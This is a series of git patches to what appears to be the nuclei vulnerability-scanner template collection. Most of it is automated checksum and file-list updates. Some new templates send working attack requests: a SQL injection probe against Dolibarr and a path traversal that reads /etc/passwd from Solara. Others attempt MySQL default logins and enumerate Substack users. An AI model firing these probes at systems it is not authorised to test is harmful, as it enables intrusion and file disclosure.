No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 062e5c85b4..5614320187 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210090000efc65f8f70d339ccb119b0936996ee15b23c51e805662aba28ca56439fa022100e3dcc0ebc74fe3eaa2539c56bdda80b0f14420c18e39c50b7764a9d2b8e39a09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 6dcfdda117..792fb15896 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022033e248f197a7bf7d30a3400b0fa846a229dd824dee529409ac181cdead3ee2f8022100f268b69253633c6051e31fed38270a5febc42180ba04a054f22b28d4100c8aff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From aa5588412fe1f10ef634b7e1350d22af3bd94fa4 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 25 Jul 2024 08:49:36 +0000 Subject: [PATCH 1615/1841] Auto Generated New Template Addition List [Thu Jul 25 08:49:36 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 10a830a263..7d31d58375 100644 --- a/.new-additions +++ b/.new-additions @@ -15,6 +15,7 @@ http/cves/2024/CVE-2024-32238.yaml http/cves/2024/CVE-2024-34257.yaml http/cves/2024/CVE-2024-34351.yaml http/cves/2024/CVE-2024-3742.yaml +http/cves/2024/CVE-2024-37843.yaml http/cves/2024/CVE-2024-40348.yaml http/cves/2024/CVE-2024-4257.yaml http/cves/2024/CVE-2024-4295.yaml From 0efb46f9111f2c295c9c44c5d7d64530647631ec Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 25 Jul 2024 08:49:41 +0000 Subject: [PATCH 1616/1841] Auto Generated Templates Checksum [Thu Jul 25 08:49:41 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 3ccb2e5a18..c0581acb32 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3496,6 +3496,7 @@ http/cves/2024/CVE-2024-37032.yaml:098e78c2cfc97aee7b9e22ff34101e609f023cc2 http/cves/2024/CVE-2024-37152.yaml:45b7e5ca110853fe4cca80588d33d140f611d1e2 http/cves/2024/CVE-2024-37393.yaml:c7cac02b06ca12c407122ea2fff033456006d7dd http/cves/2024/CVE-2024-3742.yaml:c14a1c00e621d1d77ddf978af6680fc4b05c3aa1 +http/cves/2024/CVE-2024-37843.yaml:dc881e4de411f052173b23a79404997dd5f16e7f http/cves/2024/CVE-2024-37881.yaml:060af3bf51e4ab05684d4923658d02b3c49583bb http/cves/2024/CVE-2024-3822.yaml:2dd9c56b09c0619afb49b80cbcb5979b3eae5a1c http/cves/2024/CVE-2024-3922.yaml:768a5cb24e6893fee27193eda765eeeaedae2a21 @@ -8919,7 +8920,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:4dde7acf0da171c9493bf4f4e8555a0f1f21805b +templates-checksum.txt:d0a78187b729d7b6b5db22840e248510961fae5e vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From c129e437529abef67bb6ef74f626dae79002adef Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 25 Jul 2024 08:50:32 +0000 Subject: [PATCH 1617/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 7696877b98..733d7b9995 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -20,6 +20,7 @@ on: - 'http/cves/2024/CVE-2024-34257.yaml' - 'http/cves/2024/CVE-2024-34351.yaml' - 'http/cves/2024/CVE-2024-3742.yaml' + - 'http/cves/2024/CVE-2024-37843.yaml' - 'http/cves/2024/CVE-2024-40348.yaml' - 'http/cves/2024/CVE-2024-4257.yaml' - 'http/cves/2024/CVE-2024-4295.yaml' From 93f324086f8c9e4f5e44420b70f0c12577d0596e Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 25 Jul 2024 14:23:01 +0530 Subject: [PATCH 1618/1841] FIX mysql-default-login.yaml --- javascript/enumeration/mysql/mysql-default-login.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/javascript/enumeration/mysql/mysql-default-login.yaml b/javascript/enumeration/mysql/mysql-default-login.yaml index 4665e1f88a..c6af725762 100644 --- a/javascript/enumeration/mysql/mysql-default-login.yaml +++ b/javascript/enumeration/mysql/mysql-default-login.yaml @@ -18,7 +18,7 @@ javascript: code: | var m = require("nuclei/mysql"); var c = m.MySQLClient(); - c.Connect(Host,Port,Username,Password) + c.Connect(Host,Port,User,Pass) args: Host: "{{Host}}" @@ -46,4 +46,4 @@ javascript: - "response == true" - "success == true" condition: and -# digest: 4a0a0047304502203b16c0831093780883fc023d676c54ec2533d4ac05f2071bea5d68c33ca8b63002210092abea71a11967719f8565e6fc01a8e49569bd807e9cc5b80192f8011c456d0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203b16c0831093780883fc023d676c54ec2533d4ac05f2071bea5d68c33ca8b63002210092abea71a11967719f8565e6fc01a8e49569bd807e9cc5b80192f8011c456d0f:922c64590222798bb761d5b6d8e72950 From e7f8f44e26cae10a842db3ce0a99a0cc90182513 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 25 Jul 2024 14:45:07 +0530 Subject: [PATCH 1619/1841] Create CVE-2024-5315.yaml --- http/cves/2024/CVE-2024-5315.yaml | 59 +++++++++++++++++++++++++++++++ 1 file changed, 59 insertions(+) create mode 100644 http/cves/2024/CVE-2024-5315.yaml diff --git a/http/cves/2024/CVE-2024-5315.yaml b/http/cves/2024/CVE-2024-5315.yaml new file mode 100644 index 0000000000..f33caf9daf --- /dev/null +++ b/http/cves/2024/CVE-2024-5315.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-5315 + +info: + name: Dolibarr ERP CMS `list.php` - SQL Injection + author: rootxharsh,iamnoooob,pdresearch + severity: critical + description: | + Vulnerabilities in Dolibarr ERP - CRM that affect version 9.0.1 and allow SQL injection. + impact: | + These vulnerabilities could allow a remote attacker to send a specially crafted SQL query to the system and retrieve all the information stored in the database through the parameters viewstatut in /dolibarr/commande/list.php + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-5315 + - https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-dolibarrs-erp-cms + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.1 + cve-id: CVE-2024-5315 + cwe-id: CWE-89 + epss-score: 0.00043 + epss-percentile: 0.09367 + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"Dolibarr" + tags: cve,cve2024,dolibarr,erp,sqli,authenticated + +variables: + username: "{{username}}" + password: "{{password}}" + +http: + - raw: + - | + POST /htdocs/index.php?mainmenu=home HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + loginfunction=loginfunction&username={{username}}&password={{password}} + + - | + GET /htdocs/commande/list.php?viewstatut=x%27 HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body_2 + words: + - You have an error in your SQL syntax + + - type: word + part: header_1 + words: + - 'Set-Cookie: DOLSESSID_' + + - type: word + part: body_1 + words: + - SuperAdmin From 1deab06dafc1bc401a09a530764a3dcae246f1b5 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 25 Jul 2024 14:53:35 +0530 Subject: [PATCH 1620/1841] Update apache-gravitino-detect.yaml --- http/technologies/apache/apache-gravitino-detect.yaml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/http/technologies/apache/apache-gravitino-detect.yaml b/http/technologies/apache/apache-gravitino-detect.yaml index 0bb850ea68..8446f9384f 100644 --- a/http/technologies/apache/apache-gravitino-detect.yaml +++ b/http/technologies/apache/apache-gravitino-detect.yaml @@ -22,9 +22,7 @@ http: matchers: - type: word words: - - 'Gravitino' - - 'gravitino' - condition: and + - 'Gravitino' - type: status status: From 596de406d87b7bd1323355627e91fa2888b0d17a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 25 Jul 2024 15:09:32 +0530 Subject: [PATCH 1621/1841] Create CVE-2024-39903.yaml --- http/cves/2024/CVE-2024-39903.yaml | 47 ++++++++++++++++++++++++++++++ 1 file changed, 47 insertions(+) create mode 100644 http/cves/2024/CVE-2024-39903.yaml diff --git a/http/cves/2024/CVE-2024-39903.yaml b/http/cves/2024/CVE-2024-39903.yaml new file mode 100644 index 0000000000..439cd7cf71 --- /dev/null +++ b/http/cves/2024/CVE-2024-39903.yaml @@ -0,0 +1,47 @@ +id: CVE-2024-39903 + +info: + name: Solara <1.35.1 - Local File Inclusion + author: iamnoooob,rootxharsh,pdresearch + severity: high + description: | + A Local File Inclusion (LFI) vulnerability was identified in widgetti/solara, in version <1.35.1, which was fixed in version 1.35.1. This vulnerability arises from the application's failure to properly validate URI fragments for directory traversal sequences such as '../' when serving static files. An attacker can exploit this flaw by manipulating the fragment part of the URI to read arbitrary files on the local file system. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-39903 + - https://github.com/widgetti/solara/commit/df2fd66a7f4e8ffd36e8678697a8a4f76760dc54 + - https://github.com/widgetti/solara/security/advisories/GHSA-9794-pc4r-438w + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L + cvss-score: 8.6 + cve-id: CVE-2024-39903 + cwe-id: CWE-22 + epss-score: 0.00044 + epss-percentile: 0.109 + metadata: + fofa-query: icon_hash="-223126228" + verified: true + max-request: 1 + tags: cve,cve2024,solara,lfi + +http: + - raw: + - |+ + GET /static/nbextensions/#/../../../../../../../../../../etc/passwd HTTP/1.1 + Host: {{Hostname}} + + unsafe: true + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: regex + part: content_type + regex: + - "text/plain" + + - type: status + status: + - 200 From 9d01690a503be90cf506889f5c0de765168245b8 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 25 Jul 2024 15:40:09 +0530 Subject: [PATCH 1622/1841] Create substack.yaml --- http/osint/user-enumeration/substack.yaml | 34 +++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 http/osint/user-enumeration/substack.yaml diff --git a/http/osint/user-enumeration/substack.yaml b/http/osint/user-enumeration/substack.yaml new file mode 100644 index 0000000000..baf9eef9c7 --- /dev/null +++ b/http/osint/user-enumeration/substack.yaml @@ -0,0 +1,34 @@ +id: substack + +info: + name: substack.com User Name Information - Detect + author: cheesymoon + severity: info + description: substack.com user name information check was conducted. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 1 + tags: osint,substack + +self-contained: true + +http: + - method: GET + path: + - "https://substack.com/@{{user}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "No people found for" + negative: true + + - type: word + part: body + words: + - 'handle\":\"{{user}}\"' From fd8c1a519eea87e111bbb965d414a9b67b448d37 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 25 Jul 2024 11:30:39 +0000 Subject: [PATCH 1623/1841] Auto Generated New Template Addition List [Thu Jul 25 11:30:38 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 7d31d58375..07ab07acb5 100644 --- a/.new-additions +++ b/.new-additions @@ -1,5 +1,6 @@ headless/2024/CVE-2024-38526.yaml http/cnvd/2023/CNVD-2023-72138.yaml +http/cves/2022/CVE-2022-34267.yaml http/cves/2022/CVE-2022-38322.yaml http/cves/2022/CVE-2022-45269.yaml http/cves/2023/CVE-2023-2309.yaml From 88aa0e2b4b037802eec83923e5123a3da77ab6c2 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 25 Jul 2024 11:30:43 +0000 Subject: [PATCH 1624/1841] Auto Generated Templates Checksum [Thu Jul 25 11:30:43 UTC 2024] :robot: --- templates-checksum.txt | 405 +++++++++++++++++++++-------------------- 1 file changed, 203 insertions(+), 202 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index c0581acb32..8b1a6cbc09 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2840,6 +2840,7 @@ http/cves/2022/CVE-2022-34049.yaml:50c3e971603a6b6b59cf47ea353d59db6ce9a94e http/cves/2022/CVE-2022-34093.yaml:507d9374130389cd1aec5b58c6adb274020e93c7 http/cves/2022/CVE-2022-34094.yaml:532360cc425c43471f60b0c3a4668b2b416ba392 http/cves/2022/CVE-2022-34121.yaml:dbea363aeb740fe3e7119e4e1fdb4a7c39c07d28 +http/cves/2022/CVE-2022-34267.yaml:3691097ede913720b5bc51c659d650422424bce8 http/cves/2022/CVE-2022-34328.yaml:bcf3e8505f0ea0d20573124187336e6991c961aa http/cves/2022/CVE-2022-34534.yaml:2bbe4596a2683f6464b9c40222fdd20c944edc8e http/cves/2022/CVE-2022-34576.yaml:c9eb8acdc06081e67f0d7f015281f30f203eea51 @@ -3521,7 +3522,7 @@ http/cves/2024/CVE-2024-5947.yaml:1007c228fb459bf995a9b759b10c668e190ab1e6 http/cves/2024/CVE-2024-6028.yaml:5bb353f3acbac441334cb7219e4198515178e991 http/cves/2024/CVE-2024-6188.yaml:dc4f78116668d20ee580f223cdf67a19cd0c6f26 http/cves/2024/CVE-2024-6289.yaml:83d044a4385a60a024a6dee9f02644f4db94a4b7 -http/cves/2024/CVE-2024-6587.yaml:41f032f7fdea0ab85006037157cde723104631f4 +http/cves/2024/CVE-2024-6587.yaml:3b9b74b62b5fee24b9ae9e2138affc55ffabe1d3 http/cves/2024/CVE-2024-6646.yaml:2e73ea26a9329272c114fbee69cc648183fda206 http/default-logins/3com/3Com-wireless-default-login.yaml:80e8ff28f6fe58cd692d51a649e382978ba730c3 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce @@ -7320,230 +7321,230 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 -http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 +http/technologies/wordpress/plugins/ad-inserter.yaml:4489db8b4effdc5acfb2512eebd7fe8d71b9fbcf +http/technologies/wordpress/plugins/add-to-any.yaml:78cab82afd1d6d0f4c08f4907868458c9a2ce804 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:212d13144797e3fbe1a295f6c75ecbdcf9fb3982 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d -http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:494941836cdd32c55d48fb5144b4715e18bc1286 +http/technologies/wordpress/plugins/akismet.yaml:63ab994340b90872e57516e11a280a5a86696153 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 -http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 -http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c -http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:ae6088c437ae06debbae7fe3dc1041c52b2c680a +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:52d912aa5c5bd643aec4a17977d21dbb8fec7196 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:5456c1ae86c0402f7bd61cdabe18625a17f6df19 +http/technologies/wordpress/plugins/amp.yaml:f5a0e59b28b79190de7d91ed932526361e9ac305 +http/technologies/wordpress/plugins/antispam-bee.yaml:d556d5513fd9f7ec878c8b9c91c3a398aef646cc +http/technologies/wordpress/plugins/astra-sites.yaml:d67139fe1ed9dc29ed1598a62e5b72c7996e9ff9 http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 -http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 -http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 -http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 -http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 -http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba -http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff -http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d -http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 -http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 +http/technologies/wordpress/plugins/autoptimize.yaml:c20236fe42d79e50a91660f1ad4b27e3e8870cdc +http/technologies/wordpress/plugins/backwpup.yaml:95e3728fe143867d25dbd9eb90368c7008955a97 +http/technologies/wordpress/plugins/better-search-replace.yaml:7ecaf6936d693858e68590ba740878dbac330a12 +http/technologies/wordpress/plugins/better-wp-security.yaml:1c262a34b140a6fce7891393652b58e27ee119c4 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:53c397194341a7c52e55916917fcaad6f584d46d +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:46385c610c71185dad764c8f557e0a55a334573c +http/technologies/wordpress/plugins/breeze.yaml:6636355257a3d16d9b22c2d8f3fdaaffcd349eee +http/technologies/wordpress/plugins/broken-link-checker.yaml:2bf6a599142e51a4f56ff4d1837a9bf4b228d598 +http/technologies/wordpress/plugins/chaty.yaml:e678f26d4676c240b472854228f65399b89856ee +http/technologies/wordpress/plugins/child-theme-configurator.yaml:9eb7197e6d4c0e92728941377f2c08dad572cc33 +http/technologies/wordpress/plugins/classic-editor.yaml:02a859d2552ef74c31b1415ada897107b68df442 +http/technologies/wordpress/plugins/classic-widgets.yaml:8af9bbebde46f58971b0674f80ecffff14798550 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0afa7876e0c6d43b4c1bf96b677f25c9b602b8db http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 -http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d -http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c -http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d -http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 -http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 -http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 -http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c -http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 -http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c -http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 -http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 -http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e -http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a +http/technologies/wordpress/plugins/cmb2.yaml:abc91767f37a9bde49e2077246b77220dd1f57b0 +http/technologies/wordpress/plugins/coblocks.yaml:377325fbf7a0e667fb055712fdcd4e27475c4e3d +http/technologies/wordpress/plugins/code-snippets.yaml:85d6c34fe3ab25f3fa5b627561ffeb989518a0d8 +http/technologies/wordpress/plugins/coming-soon.yaml:92145d01e14c47083d14444ef44841898fd610cd +http/technologies/wordpress/plugins/complianz-gdpr.yaml:3c1504569e74bd0133f8816bb1a5ba1c12b547c1 +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:781cc13ceadb65f7fda09aaa4f4a2e8f17ef4ff7 +http/technologies/wordpress/plugins/contact-form-7.yaml:ec85ed9f79435afea7d240b3fbe0e1bc70591ebb +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:f8d3aaf7535abbb8c5d9d7b3269f1d18ba5dae41 +http/technologies/wordpress/plugins/cookie-law-info.yaml:3e70b0bd5eac4b065ea1e9f14c9d4e1ad68a7d6f +http/technologies/wordpress/plugins/cookie-notice.yaml:385b0904015ec683e59bbdcdadc5691b395b4595 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:0de66893efe5b84c0f582f63781c78ec6f2ac59e +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:631283326bd4860e2712ce5b76178d877fb5e1fb +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:72798a3255459c88fc70f6eede053ab3d01937e3 +http/technologies/wordpress/plugins/custom-css-js.yaml:263232eda0e1bec7b6b48e8a60d42f3abe733bbe +http/technologies/wordpress/plugins/custom-fonts.yaml:85a0f1d3042d4bef97d911d1b7be9f7b1f8a693d +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:344d7cf3a76c6f4e40596487bd22be5da3819f01 +http/technologies/wordpress/plugins/disable-comments.yaml:c5cc81043ae2445cca080893abf5ed0d1f901d4f +http/technologies/wordpress/plugins/disable-gutenberg.yaml:d4241f492c5468e92f364258e378aaaa97df2ec2 +http/technologies/wordpress/plugins/duplicate-page.yaml:6e7fa691bfdb6bb95240653098ea95e2be8862ef +http/technologies/wordpress/plugins/duplicate-post.yaml:a271fab75ef672e3c02438acec17a1faa7f28495 +http/technologies/wordpress/plugins/duplicator.yaml:eecf1c7590b6fed26d0f853900145a139b9091af +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d21a23a00ccd1c1e2466bc68a8b9d7b585703f18 http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 -http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 -http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 -http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d -http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc -http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 -http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 -http/technologies/wordpress/plugins/fluent-smtp.yaml:f8756f30bfdc614abb6aa0cef6f395e5a96615d8 -http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 -http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e -http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 -http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa -http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 -http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 -http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 